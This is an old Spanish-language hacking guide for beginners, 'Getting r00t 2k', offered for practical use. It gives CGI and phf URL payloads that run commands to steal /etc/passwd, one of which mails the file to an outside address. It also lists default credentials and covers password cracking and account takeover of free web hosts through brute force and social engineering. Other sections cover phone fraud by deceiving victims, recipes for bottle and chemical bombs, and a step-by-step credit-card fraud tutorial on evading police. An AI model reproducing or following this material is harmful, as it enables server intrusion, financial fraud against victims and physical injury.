GR2k

<< InDeX >>

1.0% Presentación.
1.1% Advertencia y copyright.
1.2% Reglas a seguir para ser un buen hacker.
1.3% Pequeño diccionario de hacking.
2.0% Tecnicas para el Hacking de sitios web:
2.1% Cgi-bin.
2.2% Phf.
2.3% Ftp.
2.4% etc/passwd.
2.5% Passwords mas comunes.
2.6% Passwords por defecto.
2.7% FrontPage Bug.
3.0% Hackeando servicios gratuitos:
3.1% Hackeando Geocities.
3.2% Hackeando Xoom.
4.0% Cracking:
4.1% Crackeando sitios xxx.
5.0% Phreaking:
5.1% Anonimato y Telefono Gratis.
5.2% Contestadores Automaticos.
6.0% Misc.:
6.1% Como crear Bombas.
6.2% Carding Basico.
6.3% Cool Links.
7.0% Despedida

1.0% Presentación.

1.1% > Advertencia y Copyright

Bienvenido a la guia de hacking Getting r00t 2k (BETA 1).La guia GR2k esta en una fase beta asi ke no se preocupen ke en poco tiempo la ire mejorando.Esta guia fue escrita (mejor dicho, comenzo a ser escrita) por psiconauta desde Buenos Aires, Argentina durante el mes de Enero de 2000.

ADVERTENCIA:
El autor no se hace responsable por el mal uso de la información que esta
guia contiene.La guia fue escrita exclusivamente con fines educativos. P-)

Quiero aclarar que esta guia es exclusiva para personas que recien se inician en el hacking, asi que hackers, no se ofendan, :-P

Getting r00t 2k es de libre distribución y la unica condición es la de no modificarla en ninguna aspecto (me dan lastima algunos lamers que ponen sus nombres en guias y cursos ajenos).Si estas interesado en agregar una sección a esta guia solo tenes que enviarme un mail con tu articulo; este sera revisado y si es interesante se sumara a la guia junto con el nombre de su autor.
Si queres que getting r00t 2k este disponible para ser bajado de tu website solo tenes que hacerle un link a http://orbita.starmedia.com/~psicocity/getting_r00t_2k.zip y este sera bajado automaticamente, recorda avisarme cuando lo hagas.
Espero que te diviertas aprendiendo (o recordando) junto con Getting r00t 2k.

Getting r00t 2k © 1999/2000
Todos los derechos reservados a psiconauta.

1.2% > Reglas a seguir para ser un buen hacker.

1. Nunca dañes algo intencionadamente. Lo unico que conseguiras sera buscarte problemas.
2. Modifica solo lo estrictamente necesario para entrar y para evitar ser localizado, o para poder acceder otras veces.
3. No hackees nunca por venganza ni por intereses personales o economicos.
4. No hackees sistemas pobres que no puedan reponerse de un ataque fuerte. Ni tampoco sistemas muy ricos o grandes que puedan permitirse gastar dinero y tiempo en buscarte.
5. Odia a telefonica pero no te metas con ella.
6. No hackees ordenadores del gobierno. (El gran hermano te observa) Tal vez  sean mas emocionantes, pero no olvides que la policia trabaja para ellos.
7. No comentes con nadie, a menos que sea de total confianza, tus azañas. (Los mas grandes hackers de la historia han sido cazados debido a las confesiones de sus novias)
8. Cuando hables en bbs o por internet, procura ser lo mas discreto posible. Todo lo que digas quedara almacenado.
9. Se paranocio. Una da las caracteristicas principales de los mejores hackers es la paranoia.
10. No dejes ningun dato que pueda relacionarse contigo, en los ordenadores que hackees. Y si es posible, ni siquiera "firmes".
11. Estudia mucho antes de lanzarte a la practica.
12. Nunca dejes de estudiar y de aprender nuevas cosas, el mundo de la informatica avanza rapidamente, y es necesario mantener un buen ritmo si no quieres quedarte atras.

1.3% > Pequeño diccionario de hacking.

Esta lista de definiciones te seran utiles para comprender más al leer la guia.Especial para novatos.

HACKING: Penetrar en sistemas informaticos ajenos sin su consentimiento, tanto "virtualmente" como fisicamente.

HACKER: Persona que hace hacking.
Persona muy habil con los ordenadores.
> Pirata informatico, en cualquiera de sus muchos significados.

PIRATA INFORMATICO: Persona dedicada a la copia y distribucion de software ilegal, tando software comercial crackeado, como shareware registrado, etc...
> Persona que elimina las protecciones software. Mas conocido como cracker.
> Delincuente informatico.

CRACKER: Persona que elimina las protecciones logicas y a veces fisicas del software.
> Hacker que emplea la fuerza bruta, o metodos que dañan el sistema que intenta hackear.

CRACKEADOR: Programa utilizado para sacar los password encriptados de los archivos de passwords (ej. Jonh The Ripper). Bien desencriptandolos, cuando se puede, o bien provando multiples convinaciones hasta que encuentra la correcta.

INGENIERIA SOCIAL: Convencer a alguien, por diversos medios, para que nos facilite informacion util para hackear, o para que haga algo que nos beneficie. (No solo al hackear)

TRASHING: Revisar en la basura que dejan los bancos, comercios, etc para obtener datos vitales a la hora del hacking (principalmente utilizado para el carding.)

HACKEAR POR FUERZA BRUTA: Es probar distintos passwords hasta encontrar el acertado, usar un crackeador, desencriptar un fichero encriptado, sacar las claves de un archivo de passwords usando las palabras de un diccionario, etc..

FICHERO DE PASSWORD: Fichero en el que el sistema guarda sus claves de acceso.

CARDING: Uso ilegitimo de las tarjetas de credito, o sus numeros, pertenecienes a otras personas. Se relaciona mucho con el hacking, porque para conseguir numeros de tarjetas de creditos, una de las mejores maneras es el hacking.

PHREAKING: Uso del telefono, o de las redes y servicios telefonicos, gratis o con un costo menor del normal. Devido al uso intensivo del telefono por parte de los hackers, es bastante normal que usen el phreak  para ahorrarse unos mangos.
> Modificacion o intervencion de las lineas telefonicas, con otros fines distintos del llamar gratis.

BOXING: Uso de aparatos electronicos o electricos (Boxes) para hacer phreaking.

TROYANO: Programa que se queda residente en el sistema que pretendemos hackear y que nos facilita informacion sobre lo que pasa en el.(ej:Netbus, BO, etc.)

SNIFFING: Espiar y obtener la informacion que cicula por una red.

SNIFFER: Programa encargado de intercepatar la informacion que circula por la red.

TRACEAR: Seguir la pista a traves de la red a una informacion o a una persona.

BUG, AGUJERO, HOLE: Defecto del software que permite a los hackers introducirse en ordenadores ajenos.

EXPLOIT: Metodo concreto de usar un bug para entrar en un sistema.

WAR DIALER: Programa que escanea la linea telefonica en busca de modems.

PPP, TCP/IP, UDP: Distintos protocolos de comunicacion, que usan las grandes redes como internet.

SUNOS, AIX, HP/UX, IRIX, VMS, UNIX: Varios sistemas operativos que usan los grandes ordenadores.

ADMINISTRADOR, SYSOP, ROOT: Persona que se encarga del mantenimiento de un sistema informatico, generalmente tienen control total sobre el sistema.

BACKDOOR: Puerta trasera, mecanismo en el software que permite entrar evitando el metodo normal.

FIREWALL: Sistema avanzado de seguridad que impide a personas no acreditadas el acceso al sistema.

LOGIN: Procedimiento de entrar en un sistema.

2.0% Tecnicas para el Hacking de sitios web:

2.1% > Cgi-bin.

Common Gateway Interface (CGI) es una interfaz que permite la comunicacion entre programas cliente y la informacion de un servidor que comprende el protocolo de transmision de texto (HTTP).
Las vulnerabilidades causadas por el uso de los scripts CGI no son debilidades de CGI, son errores en las especificaciones HTTP y en varios programas del sistema. CGI simplemente permite el acceso a esas debilidades.
Aqui te doy un metodo para obtener el archivo etc/passwd de
:
http://www.
/cgi-bin/query?%0a/bin/cat%20/etc/passwd
Solo copia la url y pega el tu browser.Si todo sale bien obtendras el fichero etc/passwd que más adelante veremos como y para que utilizarlo.
Aqui abajo tenes otros cgi-bin que piden una copia del fichero etc/passwd:
http://www.
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
http://www.
/cgi-bin/php.cgi?/etc/passwd
http://www.
/cgi-bin/fi?/etc/passwd
http://www.
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
http://www.
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]

2.2% > Phf.

La tecnica del phf es una de las formas más viejas para obtener un password.Actualmente es muy dificil de encontrar un sitio con esta vulnerabilidad (90% de que NO), pero no esta de más comentarla 
Todo lo que tenes que hacer es abrir tu explorador y escribir lo siguiente:

http://www.
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Si todo sale bien obtendras el archivo etc/passwd de este sitio.

2.3% > Ftp.

Solo abri una venta de d.o.s y tipea ftp luego segui los siguientes pasos (esta tecnica es vastante vieja y no suele funcionar):

ftp> open
Conect to

220 victim.com FTP server ready.

ftp> quote user ftp
331 Guest login ok, send ident as password.

ftp> quote cwd ~root
530 Please login with USER and PASS.

ftp> quote pass ftp
230 Guest login ok, access restrictions apply.

ftp> dir

2.4% > etc/passwd.

Una vez obtenido el archivo etc/passwd debemos desencriptarlo para obtener el password del sitio.

root:User:g36Dfr:1j2YF6:1256:20:Superuser
Camilo:p5P:h0iuE:2552:20:Camilo,:/usr/personal/camilo:/bin/csh
BlackJack:EUhg3zACG2ab:1128:20:BlacJack LCD:/usr/personal/lcd:/bin/csh

Este es el ejemplo de un fichero encriptado normal. El superusuario es la parte que te da
el root. Es la parte que nos interesa.

root:*:0:1:Misericordios:/:/bin/sh
ftp:*:202:102:Anonymous FTP:/U1/ftp
ftpadmin:*:203:102:ftp Administrator:/u1/ftp
       
Este es otro ejemplo de un fichero password, solo que este tiene una pequeña diferencia
este está controlado. Los password controlados no te dejan ver o copiar el actual password
encriptado . Esto causa problemas para el Cracker y el diccionario que uses (después se explica).
Losiguiente es otro ejemplo de otro password controlado:

root:*:0:1:0000-Admin(0000):7:/usr/bin/csh
daemon:*:1:1:0000-Admin(0000):/:
bin:*:2:2:0000-Admin(0000):/usr/bin:

etc...
los password controlados tienen un "*" o "x" en el lugar donde va el password.
Ahora que conoces un poco más acerca de como identificar un password encriptado de un password controlado, podemos hablar de como crackearlo.

Crackear un password no es tan complicado como parece. Los archivos varían de sistema a sistema.
Debemos antes que nada, de hacernos con el fichero passwd.
Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un
diccionario. Te recomiendo usar el John the Ripper (v1.6).Lo podes encontrar en cualquier página de hacking.
Cuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas para buscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todas las posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de caracteres "raros". Lo normal es que tenga predefinido miles de palabras posibles.
Si este método no funciona se hace un rastreo completo, probando todas las combinaciones posibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el problema está en que tarda mucho. Una vez tengas el password,
tendrás acceso a todo el sistema.

2.5% > Passwords más comunes.

Esta lista con los passwords más comunes puede servirte para utilizarla como diccionario con un cracker (es muy corta pero igual sirve) o solo para conocer los passwords más usados.

> MUSICA CLASICA --> BETHOVEN - WAGNER - VIVALDI - BRAHMS - STRAUSS -
- BERLIOZ - MOZART -
> PERSONAJES DE FICCION --> FRODO - BILBO - DON QUIJOTE - GANDALF -
- NEUROMANTE - SAURON - SPOCK - JONES - SUPERMAN - SPIDERMAN - ALF -
- MORTADELO - FILEMON - THOR - RAMBO -
> ESCRITORES --> TOLKIEN - GIBSON - PEREZ REVERTE - CERVANTES -
- KING - CHRICHTON -
> CLASICOS --> EURIPIDES - SOFOCLES - DIOGENES - PLATON - ALEJANDRO MAGNO -
- ARISTOTELES - SOCRATES - SENECA -
> AJEDREZ --> CAPABLANCA - THAL - FISHER - LOPEZ - ILLESCAS - KARPOV -
- KASPAROV - TORRE - REY - REINA - CABALLO - PEON - ALFIL -
> DEPORTES --> FUTBOL - BALONCESTO - TENIS - KARATE - VOLEIBOL - PINPON -
- RUGBY - WATERPOLO - MARATON -
> ANIMALES --> FIDO - LASSIE - MICIFU - RICKY - BOBY - FIFI - TOM - BOB -
- TOMY - PERRO - GATO - PIOLIN - RINTINTIN - MILU - BALU -
> NUMEROS : 1234567890 - 111111111 - 222222222 - 1010101 - 2020202 -
- 19191919 - 333333333 - 000000000 - 968 - 906 - 900 - 69 - 91 - 93 -
> TIPICOS --> ABRETE SESAMO - 12345 - HOLA - SOY YO - JEFE - ROOT - DIOS -
- AID - CALL - CENTRAL - CHECK - DEMO - DEMOSTRATION - DISPLAY - ENGINEER -
- EXTERNAL - GATEWAY - HELP - MANAGER - NET - NETWORK - OPER - OPERADOR -
- OPERATIONS - OPS - PHONE - PRIVADO - PRUEBA - REMOTE - REMOTO - SECRET -
- SECRETO - SEXO - SISTEMA - SYSMAN - SYSOP - SYSTEM - TERMINAL - TEST -
- TESTER - DOOR - PUERTA - USER - USUARIO - SOYPAPA - CARI¥O - SOYYO -
- ESTOYAQUI - HOLA - SYSOP - MAMA -
> MITOLOGIA --> ZEUS - APOLO - JUPITER - HERMES - AFRODITA - CLIO - ATENEA -
- POSEIDON - MARTE - VENUS - PLUTON - MERCURIO - SATURNO - NEPTUNO - URANO -
AMONCIN - LOQUILLO -
> GRUPOS --> LOS INHUMANOS - DIRE STRAITS - MECANO - BEATTLES - DOORS - QUEEN - OASIS - ROLLING STONES -
> SOLISTAS --> LOUIS AMSTRONG - FRANKLING - OLFIELD - VANGELIS -
> NONBRES --> GONZALO - SERGIO - CARLOS - LUIS - JOSE MARIA - GREGORIO -
- RAMON - PEDRO - JORJE - AGUSTIN - JOAQUIN - JESUS - JUAN - MIGUEL - DAVID -
- ANTONIO - LAMAS - FRAIZ - SANCHEZ - RUIZ - GUTIERREZ - MARTINEZ - IVAN -
- PEREZ - LOPEZ -
> MUJERES --> MARIA - ANA - ROCIO - ANA - MARTA - MACARENA - LUISA - JUANA -
- GLORIA - INES - PEPA - JOSEFA - LOLA - LAURA - SILVIA - NURIA - BEATRIZ -
- CLARA - GEMA - EVA - MAITE - CRISTINA -
> ORDENADORES --> IBM - AMSTARD - COMMODORE - DELL - INTEL - MICROSOFT -
- IBM PS/2 - AMSTRAD PC1512 - COMMODORE 64 - SPECTRUM - MSX -
> RELIGION --> JESUS - BUDA - CONFUCIO - MAHOMA - PAPA - CURA - OBISPO -
- SACERDOTE - IMAN -
> PELICULAS --> CASABLANCA - LO QUE EL VIENTO SE LLEVO - CONAN -
- BLADE RUNNER - MAD MAX - RAMBO - EL PADRINO - DESFIO TOTAL -
- JUEGOS DE GUERRA - HACKERS - LA RED - MISION IMPOSIBLE - PARQUE JURASICO -
- ACOSO -
> LIBROS --> GUERRA Y PAZ - EL SEñOR DE LOS ANILLOS - EL QUIJOTE - LA BIBLIA - EL CORAN - VERSOS SATANICOS - LA CELESTINA -

2.6 % > Passwords por defecto.

Cada sistema operativo tiene una determinada cantidad de passwords por defecto que trae.Si los administradores del sitio no toman medidas podes sacar ventaja de ello.
Aqui tenes una lista con los passwords por defectos de los S.O. más difundidos (esta un poco desactualizada):

AIX
~~
guest guest

AS/400
~~~~~
qsecofr qsecofr
qsysopr qsysopr
qpgmr qpgmr
ibm password
ibm 2222
ibm service
qsecofr 1111111
qsecofr 2222222
qsvr qsvr
secofr secofr

DECserver
~~~~~~~
ACCESS
SYSTEM

Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~
HELLO MANAGER.SYS
HELLO MGR.SYS
HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP
HELLO OP.OPERATOR
MGR CAROLIAN
MGR CCC
MGR CNAS
MGR CONV
MGR COGNOS
OPERATOR COGNOS
MANAGER COGNOS
OPERATOR DISC
MGR HPDESK
MGR HPWORD
FIELD HPWORD
MGR HPOFFICE
SPOOLMAN HPOFFICE
ADVMAIL HPOFFICE
MAIL HPOFFICE
WP HPOFFICE
MANAGER HPOFFICE
MGR HPONLY
FIELD HPP187
MGR HPP187
MGR HPP189
MGR HPP196
MGR INTX3
MGR ITF3000
MANAGER ITF3000
MAIL MAIL
MGR NETBASE
MGR REGO
MGR RJE
MGR ROBELLE
MANAGER SECURITY
MGR SECURITY
FIELD SERVICE
MANAGER SYS
MGR SYS
PCUSER SYS
RSBCMON SYS
OPERATOR SYS
OPERATOR SYSTEM
FIELD SUPPORT
OPERATOR SUPPORT
MANAGER TCH
MAIL TELESUP
MANAGER TELESUP
MGR TELESUP
SYS TELESUP
MGE VESOFT
MGE VESOFT
MGR WORD
MGR XLSERVER

Major BBS
~~~~~~
Sysop Sysop

PICK O/S
~~~~~~
DSA
DS
DESQUETOP
PHANTOM

Prolog
~~~~
PBX PBX
NETWORK NETWORK
NETOP <null>

Rolm
~~~
CBX Defaults

op op
op operator
su super
admin pwp
eng engineer

PhoneMail Defaults
~~~~~~~~~~~~
sysadmin sysadmin
tech tech
poll tech

RSX
~~~
SYSTEM/SYSTEM (Username SYSTEM, Password SYSTEM)
1,1/system (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER
MICRO/RSX

System 75
~~~~~~~
bcim bcimpw
bciim bciimpw
bcms bcmspw, bcms
bcnas bcnspw
blue bluepw
browse looker, browsepw
craft crftpw, craftpw, crack
cust custpw
enquiry enquirypw
field support
inads indspw, inadspw, inads
init initpw
kraft kraftpw
locate locatepw
maint maintpw, rwmaint
nms nmspw
rcust rcustpw
support supportpw
tech field

Taco Bell
~~~~~~
rgm rollout
tacobell <null>

Verifone Junior 2.05
~~~~~~~~~~~~
Default password: 166816

VMS
~~~
field service
systest utep

UNIX
~~~
root root
root system
sys sys
sys system
daemon daemon
uucp uucp
tty tty
test test
unix unix
unix test
bin bin
adm adm
adm admin
admin adm
admin admin
sysman sysman
sysman sys
sysman system
sysadmin sysadmin
sysadmin sys
sysadmin system
sysadmin admin
sysadmin adm
who who
learn learn
uuhost uuhost
guest guest
host host
nuucp nuucp
rje rje
games games
games player
sysop sysop
root sysop
demo demo

PRIME
~~~~
PRIME PRIME
PRIME PRIMOS
PRIMOS PRIMOS
PRIMOS PRIME
PRIMOS_CS PRIME
PRIMOS_CS PRIMOS
PRIMENET PRIMENET
SYSTEM SYSTEM
SYSTEM PRIME
SYSTEM PRIMOS
NETLINK NETLINK
TEST TEST
GUEST GUEST
GUEST1 GUEST

DEC10
~~~~~
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

IRIS
~~~
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING

2.7% > FrontPage Bug.

Este bug funciona con los sitios que tienen el server de FrontPage 98 y usan Windows NT.Su utilización es realmente facil.Estos son los pasos a seguir:

Abri el explorador de FrontPage98.
Archivo/Abrir web de FrontPage.
Presiona el boton Mas Webs.
Tipea www.
y luego presiona Listar webs.
Si el sitio tiene el FP Bug te aparecera algo como <root>.
Doble Click en <root> y listo, estas dentro!

Considera que utilizar metodos como este no son meritorios pero esto queda a tu criterio.

3.0% Hackeando servicios gratuitos:

3.1% > Hackeando Geocities.

Esta tecnica es relativamente simple, lo que necesitas es ingenieria social y saber husmear en el codigo fuente.
Paso a explicar: Tenes que envia un mail hacia el webmaster del sitio de Geocities que queres hackear.Lo que tenes que lograr es que el usuario entre a Geocities, tipee su login y su password y te envie el codigo fuente de la pagina de usuarios de Geocities.

Como conseguir que te envie el codigo fuente? jeje, ingeniatelas...
Ya tengo el codigo fuente, ¿ahora que hago?
Al rededor de la linea 178 vas a ver algo como esto (#comentarios agragados x mi):
<INPUT TYPE="hidden" NAME="member" VALUE="nickom666"> #Login
<INPUT TYPE="hidden" NAME="passwd" VALUE="_5gaVFNYeEiYrv=z/kdKK"> #No sirve
<INPUT TYPE="hidden" NAME="fulladdress" VALUE="SiliconValley/Foothills/7281"> #Dirección de la pagina.
<INPUT TYPE="hidden" NAME="subdirectory" VALUE=""> # No sirve
<INPUT TYPE="hidden" NAME="email" VALUE="acidmeister@hotmail.com"> #E-mail con el que el usuario se subscribió.
<INPUT TYPE="hidden" NAME="geoextras" VALUE="NN1NN"> #No sirve
<INPUT TYPE="hidden" NAME="diskspace" VALUE="11"> #No sirve
<INPUT TYPE="hidden" NAME="timestamp" VALUE="901868702"> #No sirve
</FORM><form method="post" action="/cgi-bin/geoguide/geoguide_verify">
<INPUT TYPE="hidden" NAME="member" VALUE="nickom666"> #login ---LO QUE NECESITAS!
<INPUT TYPE="hidden" NAME="passwd" VALUE="hlxwxe"> #password ---LO QUE NECESITAS!

LOGIN: nickom666
PASSWORD: hlxwxe

Ahora que ya tenes el login y el password solo te queda acceder a su sitio via ftp o html y hacer lo que quieras con el! jeje...
Esta tecnica tambien sirve para hackear sitios de Angelfire y otros.Provaló con los proveedores de sitios web gratuitos que conoscas...quiza tengas suerte ;)

3.2% > Hackeando Xoom.

Para hackear la web de un usuario de Xoom es necesario usar un cracker de fuerza bruta.Yo recomiendo que uses el WebCracker.
Lo que tenes que hacer es tipear en "Target Url" del WebCracker: http://services.xoom.com/
Luego crear una lista de User Id que contenga el nombre su pagina de Xoom (ej: si la url es http://members.xoom.com/Ejemplo en la lista debes tipear Ejemplo unicamente.)
Como lista de passwords debes utilizar una que este en tu poder.
Finalmente presiona el botón Start! y el programa comenzara a trabajar.Si obtenes el password solo te queda conectarte a ftp.xoom.com (via ftp), poner su Login y Password y estas dentro!.

4.0% Cracking:

4.1% > Crackeando sitios xxx.

Para crackear un sitio porno usaremos nuevamente el WebCracker.Lo unico que tenes que hacer es saber la url de la pagina que pide el login y el password de gente registrada a ese sitio porno.Unica vez encontrada la url solo te queda usar unas suculentas listas de logins y passwords.No es muy dificil conseguir acceso gratuito debido a que muchos de los usuarios registrados son idiotas y elijen logins y passwords comunes.

5.0% Phreaking:

5.1% > Anonimato & Telefono Gratuito.

(!) Estas tecnicas son validas unicamente para los usuarios de Telefonica Argentina.

Para hacer una llamada y que tu numero no salte en el aparatito detector de llamados debes hacer esto: marca *31# y el telefono.

Para usar el telefono gratuitamente tenes que hacer algo similar pero un poco más dificil: llama a una persona y decile que sos de telefonica y que estan provando no se que huevada del telefono; tenes que lograr que la persona marque *90#.Si la persona hace esto tendra que pagar la cuenta de telefono que vos gastas! jaja.Tene cuidado con esta tecnica por que no se como desabilitar que la persona deje de pagar por vos y puede terminar mal.

5.2% > Contestadores Automaticos.

Los contestadores automáticos suelen responder de alguna manera a la pulsación de la tecla *, asi que lo primero que puedes hacer es pulsarla. Si es un contestador de estos normales, te contestará con un pitido. Bien. A continuación no hará nada mas, asi que lo que ahora te está pidiendo es la clave.
Usualmente, la gente de las empresas no se complica mucho, asi que buscarán una clave facilita, algo asi como 11, 123, 99, 88, y cosas parecidas.
La mayoria de la gente tiene los modelos de Panasonic que solo utilizan codigos de 2 digitos, facil de buscar el codigo solo va de 0-99 (100 codigos).
Para hacerlo es aun mas facil, con enviar la siguiente combinacion ya hemos
enviado todos los codigos:

01122334455667788991357902468036925814715937049483827261605172959628408
529639974197531864209876543210

Pero si consideramos que generalmente los modelos Panasonic no usan digitos
del 0 al 9, solo algunos, solo se deberia enviar una combinacion como la si-
guiente o algo parecida:

33556636653

Una vez que ingresamos el codigo correcto, el contestador nos va a tirar una
serie de BEEPs y se queda esperando a que le mandemos un comando.
Ahora tenes todo el control del contestador, hace lo que tu imaginación te diga.

6.0% Misc.:

6.1% > Como crear bombas.

> Polvora
Materiales:
Nitrato de Potasio
Carbon Vegetal
Azufre
Fabricacion:
6 Partes de Nitrato de Potasio
2 Partes de Carbon Vegetal
1 Parte de Azufre
> Bomba de Carbonato
Materiales:
Botella de Coca-Cola de 2 Litros
Carbonato de Calcio
Agua
Fabricacion:
Pone de 500 a 800ml de agua en la botella y adiciona rapidamente piedritas de CARBONATO DE CALCIO O CARBURO (es facilmente encontrado en ferreterias ya que se usa para el gas de la soldadora autogena). La botella rapidamente explotara dejando salir el gas, pero si se necesita una explocion mejor se puede colocar a un lado de la botella cerrada una vela o algo que tenga fuego, entonces cuando se produsca la explocion el gas ardera produciendo una enorme bola de fuego.
> Bomba de Hielo Seco
Materiales:
Botella de Coca-Cola de 2 Litros
Hielo Seco
Agua
Fabricacion:
Recomiendo esta bomba ya que es facil conseguir los materiales y es muy divertida, colocar en la botella de coca cola de 2l bastante hielo seco y lugo añadir rapidamente agua, obiamente tapar la botella y correr ya que rapidamente el gas producido por el hielo seco explotara y destruira la botella.
> Bomba de Cloro
Materiales:
Botella de Coca-Cola de 2 Litros
Cloro Granulado
Alcohol Comun
Fabricacion:
Ponga 200ml de alcohol en la botella y luego deposite 150 gramos de cloro tape la botella y agitela bien luego corra, la mescla estallara en 2 o 5 minutos, es recomendada para hacer mucho ruido.
> Bola de Tenis Bomba
Materiales:
Pelotita de Tenis
Una mecha de Hilo con Alcohol
Muchas Cabecitas de Fosforo
Fabricacion:
Hace un pequeño corte en la pelota y llenala con cavezas de fosforo que podes cortar con un alicate luego cerra la pelota con cinta adeciva preferentemente tiene que quedar bien fuerte dejando un ahugero para una mecha de hilo vañado en alcohol de quemar, bueno luego lo unico que tenes que hacer es prender la mecha esperar a que explote, es divertido pero tambien te puedes ingeniar para hacerlo con otros objetos como un tubo de camara de fotos una virome.
> Bomba de Bicarbonato
Materiales:
1 Tubo de donde vienen los rollos de fotos
1 Paquete pequeño de Bicarbonato de Sodio
1 Poco de Vinagre Blanco
Fabricacion:
Recomiendo esta bomba para hacer cagar a al algun amigo ya que el bicarbonato se consigue en la farmacia y es de venta al publico si ninguna orden de por medio.Lo que se debe hacer es poner bicarbonato de sodio en un papel fino y luego envolverlo, ponerlo en el fondo de tubo de fotos, rapidamente llenar el tubo con vinagre y cerrarlo, nos dara 1 o 2 minutos para ponerlo en donde queramos y alejarnos ya que al juntarce el bicarbonato con el binagre se forma un gas y una espuma que haran explotar el tubo de fotos. Es muy divertido pero inofencivo.

6.2% > Carding Basico.

Algunas de las cosas que podes hacer con tener los datos de una tarjeta de credito robada son:

* Comprar productos por Internet.
* Obtener un dominio propio (ej: www.ejemplo.com)
* Conseguir afiliarte a paginas XXX pagadas.
* Sacar cuentas de conexion a internet via On-Line (Ej:www.ciudad.com.ar)

PASOS:
------
1- COMO OBTENER Nº DE TARJETAS DE CREDITO
2- COMO IR A RETIRAR EL PRODUCTO SIN CAER EN CANA :)
1) Para comprar un producto en Internet con una tarjeta robada primero necesitas los datos de la tarjeta de credito de alguien, que obtuviste mediante el trashing (revisar en la basura de los bancos o comercios), mediante el carding (obtener tarjetas de credito con programas que generan nº de tarjetas) entre otros.Tambien podes hacerlo llamando al trabajo de una persona que busques en la guia telefonica y decirle a esta que sos de MasterCard, American Express, Visa, etc y que hubo problemas con su tarjeta  de credito y necesitas que te diga nuevamente los datos (ingenieria social) o simplemente por tus propios medios.
2) Ahora que ya tenes los datos tenes que ir a una web donde se pueda comprar productos con tarjeta de credito.Ingresas los datos de la tarjeta que obtuviste y poner como direccion de envio:
- la de una casilla de correo (no recomendado) que tenes (usar datos falsos en la empresa de correo).*
- La direccion de una casa que quede cerca de tu casa e ir a retirar el producto poniendo como excusa que diste mal la direccion a donde enviar el producto o un verso de ese estilo.
- Dar la direccion de un kiosco, una casa en alquiler o abandonada, pedir fecha de entrega detallada e ir a retirarlo.

* Para que puedas enviar los productos que compres a una casilla de correo los datos que pongas para sacar tu casilla tienen que ser falsos por que sino te pueden pescar y ahi sos hombre muerto.
Tambien tenes que comprar justo cuando la tarjeta comienza para que al dueño de la tarjeta no le llegue la factura antes que el producto te llegue a vos.
**Si haces todo esto bien estas listo para conseguir productos GRATIS en Internet.


(!) No te recomiendo que hagas todas estas cosas pero si estas decidido a hacerlo tene mucho cuidado ya que es muy peligroso.

PARA HACER CUALQUIERA DE ESTAS COMPRAS RECOMIENDO CONECTARSE CON OTRA CUENTA DE INTERNET ASI TUS DATOS NO SON REVELADOS.SI QUERES ESTAR MAS SEGURO USA PROGRAMAS COMO EL JAMMER, QUE PERMITEN MANTENERTE EN EL ANONIMANTO, TAMBIEN TE RECOMIENDO SPOFEAR TU IP.

6.3% > Cool Links

> HACKED SITES:
www.2600.com
www.hackedsites.com

> HACK FILES:
www.hackersclub.com/km/files
www.hackers-supply.com

www.vanhackez.com

www.ezkracho.com.ar
> HACK, CRACK and WAREZ SEARCH:
www.astalavista.box.sk
search.warez.com
www.warezcrawler.com

> LINUX:
www.slackware.com
www.linux.org.ar
www.redhat.com
www.linux.org
www.debian.org
www.wgs.com
www.trans-am.com

> NEWS:
www.hackersnews.com
www.rootshell.com

TARIFAPLANA2000
en Argentina & Sudamerica

-

7.0% Despedida:

Finalmente me despido;espero que la guia te halla sidó util para iniciarte en el hack.Me gustaria que me mandes un mail con tus comentarios sobre la guia o algo.

Adio,
psiconauta
Email: psiconauta2k@yahoo.com
Web Site: http://psicocity.cjb.net/

HaCk THe FuCK1nG PLaNeT!